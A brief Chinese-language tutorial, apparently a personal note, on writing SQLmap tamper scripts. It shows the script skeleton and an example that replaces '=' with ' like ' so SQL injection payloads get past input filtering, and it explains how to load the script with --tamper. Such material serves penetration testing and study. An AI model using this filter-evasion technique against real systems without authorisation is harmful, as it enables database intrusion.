撰寫 SQLmap tamper 參數繞過腳本

###### tags: `sqlmap` # 撰寫 SQLmap tamper 參數繞過腳本 ### 腳本基本結構 ```python= #!/usr/bin/env python def dependencies(): pass def tamper(payload, **kwargs): # have some code... return payload ``` ### 簡易範例假設寫一個叫做 test123.py 的腳本 ```python= #!/usr/bin/env python # 如果使用此腳本的dbms不是mysql或mssql，就顯示警告訊息 def dependencies(): from lib.core.enums import DBMS if conf.dbms not in [DBMS.MYSQL, DBMS.MSSQL]: logger.warn("This tamper script is mainly intended for MySQL or MSSQL.") # 假設=被過濾，但是like沒被過濾 def tamper(payload, **kwargs): if payload: payload=payload.replace('=',' like ') return payload ``` 寫完後把腳本放到 sqlmap 裡有個 tamper 資料夾，丟進入後，加上參數 `--tamper test123` 即可